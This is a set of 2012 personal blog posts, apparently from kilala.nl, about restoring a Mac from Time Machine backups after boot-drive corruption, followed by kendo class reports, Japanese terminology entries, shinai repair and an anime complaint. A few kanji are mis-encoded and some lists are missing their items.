I've always been pretty "okay" about making backups. For years now I've been pulling drive images of both our Macbooks every month or two and both our systems run hourly backups to our NAS. Huzzah for Time Machine! Well, this weekend I got the chance to test our backups!

Having been bitten by the MMORPG bug after watching to much of SAO, I decided to save a lot of time (and money?) by closing the tab with worldofwarcraft.com and by reinstalling Warcraft 3. A few years back my brother-in-law Hans had given me the game for Christmas, so I still had the discs lying around. But! They're for PPC Macs only and obviously my Macbook has an Intel processor. Luckily you can download a Univerisal Binary version of the game through Battle.net (Blizzard's online store etc), after entering your CD keys. Which i promptly did.

Turns out that the whole Warcraft 3 game is a Universal Binary, except the bloody installer! WTF Blizzard?!

The solution is easy, yet stupid: install Snow Leopard (Mac OS 10.6) onto an external USB drive, which still has Rosetta (OS X's way to run PPC code on an Intel system). Everything went fine and I got the game installed. But when I tried to reboot to my Macbook's internal drive, I was greeted by the dreaded blinking question mark. Fudge! ( =_=)

The boot drive had gotten corrupted along the way. I have no clue whatsoever why, but it did. The only course of action, after I couldn't get the full disk encryption to open up, was to re-image the drive and restore from backups. The first part was easy: hook up my backup drive, boot from USB install stick and use Disk Utility to re-image. But then came the restore from Time Machine

As a Unix admin I was over thinking the whole process! I was afraid that, if I were to simply reconnect the Time Machine backup drive, the TM software would erase everything and overwrite it all. So instead I tried to use the good old Migration Assistant, which usually is a great idea. But no matter what I tried, it failed: MA wouldn't see my backups over the network and they wouldn't show up when connected locally over USB either. Turns out there are two good reasons for this:

  1. MA is meant to migrate from another system and because the backups were for this system, MA was ignoring them.
  2. TM backups made over LAN have a different structure than TM backups made onto a locally connected drive. 

Turns out that what I was afraid of, really is the right way. So here's the course of action that works:

  1. Re-image the drive, or do a clean install.
  2. Verify that the basic restore works properly.
  3. Use this command to temporarily enable the showing of hidden files in Finder.
  4. Configure Time Machine to connect to your original backup location. 
  5. Start a backup, which will first do a full inventory of what's there.
  6. When the actual file transfer starts, cancel to save time and space.
  7. Enter Time Machine. Browse to your last good backup date+time.
  8. Select your home directory and select all directories you want, including Library.
  9. Press restore and watch in awe as the counter of files quickly rises.

It could be that your restore borks once or twice, because a file is being locked by a running process. Most likely this is a cache in Library, or a plist locked by iCloud syncing. You could temporarily turn off all syncs and remove the offending files.

In my case, over 126.000 files were restored ringing in over 32GB.


kilala.nl tags: , ,

View or add comments (curr. 0)

Sword Art Online: as kendoka this irks me

2012-11-10 17:16:00

Kendo mistake in SOA

Over the past few weeks I've been following one of 2012's hit anime: Sword Art Online (trailer). I love the art work, the music, the character designs, the plot and the character development. It really is an awesomely engaging show.

It is because I love this show so much that the above screencap irks me so! They put so much effort into the show, but then make such a basic mistake! If Suguha (Kazuto's niece) is such an accomplished kendoka, who's been practicing kendo for over ten years, then she would not put a shinai with its tip down to the ground! WTF A-1?! 

ヽ(#`Д´)ノ


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Wow, a great night of kendo

2012-11-07 07:44:00

Last night turned out to be excellent!

What with the bad weather I'd left home a bit early so I'd be in time to pick up Charl from the P+R at Diemen. I arrived in time, but his bus didn't. Running almost half an hour late we stumbled into the dojo while almost everyone was already dressed. I was affraid we wouldn't be able to join in, but luckily we were simply welcomed in. It certainly was one of my fastest attempts at getting dressed ;)

Having missed the running, we joined in with the stretches and suburi. In the middle of stretching I was approached by Bert-sensei, to quickly talk about getting some replacement take for my shinai (which broke recently) and the ones I'm repairing for the dojo. He indicated that I could grab a shinai of my liking from the spares box, to take apart. Awesome! He also gave me a koban shinai (a practice sword with an oval handle) as a present. Double awesome! ( ^_^)/

During seiretsu, Heeren-sensei indicated that we will be using the next few weeks to prepare for the NKR shinsa (25th of november). This means that we will not be focusing on shiai kendo, but on clean and proper kendo. Focal points for the next few weeks are seme, ki-ken-tai ichi, and zanshin. Pay close attention to your posture, to your footwork, to your strikes, so you can demonstrate your ability at its best.

In accordance with our study goals, today's class focused on kihon practice just like last week. Using the motodachi system we practiced kirikaeshi, oki men, chisai men, oki kote-men, chisai kote-men, oki dou and repetitions of men, kote-men, dou, kote-men-dou. Students were encouraged to display proper kiai and to the timing of their footwork, which should match their strikes.

Funny thing: class started out in mawari geiko style (rotating the whole group), but was switched to motodachi style right before I was switched to the shidachi side. In a later chat with Heeren-sensei he told me he was very curious how I would deal with that situation, knowing about  my problems with breathing and panic. Whenever I'm on the shidachi side I'm bowing out pretty early, but now that I was on the motodachi side he knew I was stuck: I have a responsibility to the people on the shidachi side, because without me in my spot those people cannot practice. As Marli said when I explained this: "Booooy, he's got you pegged! He knows exactly how to get to you!" and she's right :)

Well, it worked: the added responsibility meant that I finished class just about completely and I didn't bow out from kihon practice. I am very happy that I pushed through for the shidachi I practiced with and I learned a thing or two. Sure I got tired quickly, but that was solved by foregoing my own practice two or three times: let shidachi practice, then skip my own drill to catch my breath.

Heeren-sensei took a little time to demonstrate that oki dou starts out looking like a normal men strike. You start going for men and when your opponent raises his shinai to parry, you bring your shinai to your shoulder (or sometimes higher) and strike dou. As always it is important to:

Heeren-sensei indicated that, to practice this dou strike, it is best that motodachi does not open up dou beforehand but that motodachi should only start opening when shidachi moves to strike men. He also suggested that, when paired against someone considerably shorter than yourself, you can slightly lower your posture by sinking down on your legs a bit.

Kihon practice was followed by fifteen minutes of jigeiko and of course kirikaeshi. After two rounds of geiko (thank you Charl, thank you mr Goto) my breathing got the better of me and I had to bow out. After a short recuperation I joined the bogu-less group to practice some oki kote-men and chisai kote-men with Raoul-sempai. I'm very happy that Raoul saw improvement in my kendo since the last time I'd practiced with him. He indicated that my right hand was still a bit too tense and thus too slow, but in general he saw improvements!

After class, Heeren-sensei reiterated that we need to practice proper and good kendo for the examinations. He also informed us that, starting next Saturday, class will include kata geiko which is also needed to prepare for the exams. He advised everybody to prepare by researching the kata they need to know and to watch a few videos. He also asked the kendoka with kata experience to provide guidance to their classmates.


kilala.nl tags: , , ,

View or add comments (curr. 2)

Coactive coaching: DO-DONT structure

2012-11-05 07:35:00

dont bark do restrain yourself

Recently I started a coaching process with Rockover Coaching (about which I'll write more later). In our third fruitful session I was assigned a bit of homework: make a structure for use in the office, to remind me of some of my personal DOs and DONTs.

In this case the DONT is my at-times hyperactive approach in communicating: too fast, not letting people come to their conclusions, sticking my nose in and generally forcing an opinion. The DO is the polar opposite of this, which I have already set as goal for 2012: enryo, self-restraint, calmness and respect. The intention of the structure is to put something in place that inherently reminds me of these DOs and DONTs at any given time, so I chose to hang up a poster at my desk.

Looking for graphics that trigger the DO and DONT in my mind, the DO is obviously represented by the kanji for the word "enryo" (as discussed before). When it came to the DONT one thing immediately popped into my head: Dexter's Laboratory's talking dog. The overly excited, busybusy, shouty dog who yelps for attention exclaiming that "I FOUND THE THING! THE THING! I GOT THE THING!" Or that's how it went in dutch, in english apparently it's "found you", but hey.

So... The above poster is what I whipped up in a few minutes and as per this blogpost it's delivered to my coach. There you go sir! ;)


kilala.nl tags: , , ,

View or add comments (curr. 3)

Oh iPhoto, you crazy!

2012-11-04 11:12:00

iphoto you crazy

I've fought with iPhoto before and by now I'm not nearly as happy with it as I used to be. Could be that it's getting wonky now that we have 16.000+ photos in there, but who knows. The screenshot above was just the latest bout of craziness :)


kilala.nl tags: , ,

View or add comments (curr. 0)

Kendo lexicon: seiretsu and dojo

2012-10-28 22:08:00

For many of our new members, all the Japanese terms used in class can be confusing. From my own experience I know it’s taken me months to get to know most of the common terms. Of course students can find help in the glossary compiled by our teachers, but at times a bit of extra explanation may be helpful.

We continue our series of explanatory articles with commands from the line-up. We will also provide an explanation of dojo layout.

As noisy and violent kendo class may be, there are two moments that form a stark contrast: at the beginning and end of class all students line up to thank their classmates and teachers and to meditate. The dojo is plunged into quiet, while students prepare their armor and ready themselves. Usually it’s the highest ranking student (not the sensei themselves) who call out the following commands.

The preceding paragraphs have already mentioned a lot of terms describing parts of the dojo. Below is a drawing of the Amstelveen dojo, with the most important terms shown in the right location. Both the drawing and the lexicon below could only have been made because of Dillon Lin’s excellent article on dojo layout.

The following list is ordered from the entrance, towards the highest and most important position in the room.
A few other elements often seen in dojo, but not ours are:

Our Amstelveen dojo may have neither of these two, but one could argue that the flag replaces the kamidana. Our flag is there to remind us of the dojo motto and to act as a reminder of the required frame of mind.

As always, I would like to thank Zicarlo for reviewing this article.


kilala.nl tags: , ,

View or add comments (curr. 0)

Kendo class and 'career' planning

2012-10-28 08:45:00

Lately the teachers at Renshinjuku kendo dojo have been pushing the students to challenge themselves. They're getting as many students as possible to enroll in the dutch national champioships and they also want students to prepare for their exams. Sadly I can't join the NK (due to planning) and I don't feel I'm ready to take the exams either. Kris-fukushou confirmed this to marli, when they were having a chat while I was dressing: if I were to go for ikkyu now I'd definitely not make the grade, but if I work hard I can definitely give it a good shot next winter. And I will!

I'll discuss the matter with Heeren-sensei, Loyer-sensei and both Hillen and Kris, to see what they think I need to work on the most.

Saturday's class got off to a slow start. People came in a bit too late, so we only got things on the road by 0925. In the end, turnup was not bad with eight guys in bogu and about a dozen beginners without armor. We started with the usual warming-up, after which we quickly went into seiretsu. While Loyer-sensei took the utmost beginners aside, the novices joined the more advanced group for kihon practice. The guys in bogu acted as motodachi, while the novices practiced oki-men and oki-kote-men

Then, waza practice! We started with basic kirikaeshimen and kote-men drills, then quickly moving onto more advanced materials: double hiki-men, hiki-kote-men and hiki-men-kote-do. As Kris and Hillen explained, the object is to push the envelope on our grasp of distance and footwork. In these drills it's no use to over-think your actions as a lot of it comes down to feeling what you're doing. You do an exercise, then you very quickly analyse your actions and then go on with another drill. The basics come down to:

  1. Start in taiatari.
  2. Your left foot moves backwards while your shinai moves back just enough to get a clear shot.
  3. You fumikomi when striking and land about a foot behind where you started.
  4. The second strike is made with fumikomi in the exact same spot.
  5. The third strike is made in the same spot, with the fumikomi launching you backwards.

As was said, if you overthink this then you'll just get stuck as I did. I tried to do the exercises in slow motion, but then everything fell apart. Instead, try it at 0.8 or really just 1.0 of the desired speed. 

The latter part of practice was spent on reacting to motodachi's men and kote attacks. We were free to try any techniques we like, so I focused on debana-kote, ai-kote-men and kaeshi-men. For those people joining the NK next week, we did short practice shiai. I fought Tiamat-sempai

Individual pointers I received from my teachers:

Class was closed with some reminders from the teachers.


kilala.nl tags: , ,

View or add comments (curr. 0)

Kendo lexicon: warmup and suburi

2012-10-24 22:09:00

For many of our new members, all the Japanese terms used in class can be confusing. From my own experience I know it’s taken me months to get to know most of the common terms. Of course students can find help in the glossary compiled by our teachers, but at times a bit of extra explanation may be helpful.

We continue our series of explanatory articles with words and phrases from warming up.

We will start with a list of common stretching positions, which you will hear every week when training in Amstelveen as large parts of class are conducted in Japanese. Funnily enough, in Japanese “stretching” is a loanword from english: ã‚¹ãƒˆãƒ¬ãƒƒãƒ (su-to-re-chi).

After stretching, we proceed to suburi (素振り), lit. “practice swing“, from ç´  (plain, natural) and 振り (swing). You will often also hear this called “empty strikes” as we are performing strikes without hitting any target. There are many kinds of suburi,where the following are the ones most often performed in our dojo.

As part of the instructions for suburi you will often hear additional commands.
  • Kamae to (構えと) Stand in chudan no kamae.
  • Mae & ushiromae (前 & 後ろ前) Respectively forwards and backwards. You will hear these in exercises like the square/box or cross.
  • Hidari & migi (å·¦ & 右) Respectively left and right. You will hear these in exercises that incorporate sayu men strike, like the aforementioned square/box/cross.
  • Ni-ju pon, san-ju pon, yon-ju pon etc. Literally “20 count”, “30 count”, “40 count”. Basically, the amount of suburi you are expected to do. It is suggested that you learn to count to at least 100 in Japanese.

With many thanks to Kiwa-sempai for providing the list of stretching commands and to Zicarlo for providing more help on kanji on missing terms.


kilala.nl tags: , ,

View or add comments (curr. 0)

There's something you don't see every day

2012-10-18 15:54:00

A molten sakigomu

I'd invited some of my classmates over for kendo equipment maintance and last night Sander joined me. I enjoy these evenings, not just because I like fixing equipment, but they're also a great chance to just shoot the breeze with people I normally only talk to in the dressing room. Well, that or we're bashing each others' heads in ;)

Before Sander's arrival I'd already sorted through Ton-sensei's bit bucket to see what's available. I had to get rid of a bunch of tsukagawa (handle covers) because they were covered in mold. Ditto for some of the sakigawa (tip cover). I quickly put everything into their own bags, to keep things tidy.

We got started on our own shinai, after which we moved on to a bunch of loaner shinai from our dojo. My own shinai had a broken take, after last tuesday's horrible night. Luckily the take was recoverable after getting rid of the split-off piece. Obviously I'll let the guys at the dojo check it over first, to make sure I'm not putting anyone in danger. Sander's shinai were still in good condition, so he was done pretty quickly.

Then! On to the loaners! While Sander worked on one of the adult's versions, I patched up the two kids' shinai. The first one went pretty quickly, but the second one provided a surprise! See the picture above: the sakigomu (a plastic or rubber stopper in the tip) had melted! I've never seen that before! The molten rubber had cemented the take together and the sakigawa was also hard to remove. In the picture above I've outlined what was left of the rubber in white. The part that sticks out on top was completely gone! :D I guess someone left that thing lying right next to a heater or something. I managed to clean everything up nicely with some turpentine, but now I need to dig through the bit bucket to find another sakigawa in the right size. 

I'm very happy for Sander, who completed his very first complete tear-down and build-up last night! He completely disassembled the loaner shinai, replaced one of the take (too worn down) and he even re-tied the sakigawa to a new tsuru. Great job! That knot is a bit of a challenge! I know I'm keeping one of the worn, cut-off sakigawa for reference ;)


kilala.nl tags: ,

View or add comments (curr. 2)

That didn't go too well (some good stuff as well)

2012-10-17 07:44:00

All of yesterday I'd been feeling crappy, so I wasn't altogether too confident going to kendo. It was nice going together with Herman and Charl though :)

As I'd feared I had to bow out during kihon practice, because I was soo tense and out of breath that I'd keel over if I didn't. I don't know what was up yesterday, but all my muscles are/were tight as heck and my breathing patterns were a complete mess. Meh. So I quickly joined Roelof-sensei and Herman at the beginners' side. There I practiced oki-men, sayu-men and the semete-men movements we've been working on for the past weeks.

Pointers that I was given during class:

During class I noticed that I'd cracked one of the take on my newer shinai. ( ;_;) I guess Roelof-sensei sure had a point when he said I was hitting too hard. I'll see if I can fix that tonight, otherwise I'll find another solution.

EDIT:
When it comes to good stuff (it's not all bad), I've been writing a lot for the new Renshinjuku kendo dojo website. Aside from summaries of the classes I attend and some news posts about kendo events, I have also started a series of lexicographical articles. I know from experience that all the Japanese terms and phrases can be confusing for beginners, which is why I want to take the time to explain them. Of course there's the dictionary list compiled by our teachers, but that only provides translations and little explanation.

First up in the series is an explanation of the various types of geiko ("training"). Next up, to be published on sunday, is an explanation of all the commands used during warming-up and the various types of suburi. In the near future I'll also write about the commands in seiretsu (plus some background on dojo layout) and about our equipment.


kilala.nl tags: , , ,

View or add comments (curr. 2)

Kendo lexicon: keiko

2012-10-14 22:10:00

For many of our new members, all the Japanese terms used in class can be confusing. From my own experience I know it’s taken me months to get to know most of the common terms. Of course students can find help in the glossary compiled by our teachers, but at times a bit of extra explanation may be helpful.

We’ll start off this series of lexicon posts with the types of keiko.

The word keiko itself means “practice”, “study” or “training” and consists of two kanji, ç¨½ (kei, to think/consider) 古 (ko, old). One could say that everything we do in the dojo is keiko.

With many thanks to Zicarlo for advising on the additional meaning of various kanji.


kilala.nl tags: , ,

View or add comments (curr. 0)

Hillen is back!

2012-10-13 12:51:00

Today started with a pleasant surprise: Hillen has returned to join Loyer-sensei and Kris-fukushou in teaching us. We also had a lovely, large group of 21 today with two fresh faces and four guys still working their way to wearing a uniform. With eight or nine guys in bogu it might not be much, but for Almere that's a decent show :)

After kata practice and warming up we quickly proceeded with kihon practice. Loyer-sensei took the newbies aside for the basics, while the beginners practiced men, kote-men and kote-men-do on motodachi in bogu. It gives me great pleasure to see that, in mawari geiko, the fundamentals of reiho are now falling into place. Beginners and advanced folks alike take the apropriate approach: bow (onegai shimasu), step into kamae, do your exercise, back into kamae, sheathe your shinai and step back, bow, then bow again when everybody's done (arigatou gozaimashita) and kotai towards the next partner.

The beginners then joined Ton-sensei with the newbies for further kihon training, while those in bogu proceeded with waza. Chiisai kote-men, kote kote-men, men debana-kote, men hiki-men ai-men and men kaeshi-do. Each of these exercises was performed two or three times and in between were one-minute rounds of jigeiko to further practice.

In all these exercises, Kris-fukushou reminded us of the importance of building tension, of proper footwork and of feeling the proper distance and chance to make your strike. Try to use different approaches in stepping in: sometimes edge your way in sneakily, sometimes boldly step and strike. In debana-kote don't simply step aside, but first step in when striking; then move aside. In both debana-kote and hiki-men keep your movements tiny, else you are simply too slow. With all these exercises it is imperative that motodachi give his best attack! Without a proper chiisai-men, you cannot practice a proper kaeshi-do! So don't just try and whack something, make it your best strike!

Class was closed with three rounds of uchikomi geiko (third round was kakari geiko for those in bogu). Everyone was pitted against Kris-fukushou, Hillen-sensei, Raoul-sempai and Charl-sempai

At the end of class all three teachers had some closing remarks.

Pointers that I received individually:


kilala.nl tags: , ,

View or add comments (curr. 0)

Back to training

2012-10-10 08:24:00

In the absence of Heeren-sensei, class was led by Tsuyuguchi-sensei with Ran-sempai handling the translations. And with Kiwa-sempai gone for the day, Loek-sempai took care of the warming-up. After some initial confusion about the day's structure (no motodachi system, yes motodachi system, semi-motodachi system, beginners along with the bogu group) we got settled into some hard work! Who'd have thought? Even classes in Amstelveen can get a little disorganized :)

Emphasis was placed on basics: kirikaeshi, oki-men, hayai-men, hayai kote-men, men-hiki-men men-hiki-kote men-hiki-do. Tsuyuguchi-sensei impressed upon us the need for:

After a further twenty minutes of jigeiko, class was closed with parting remarks by Roelof-sensei.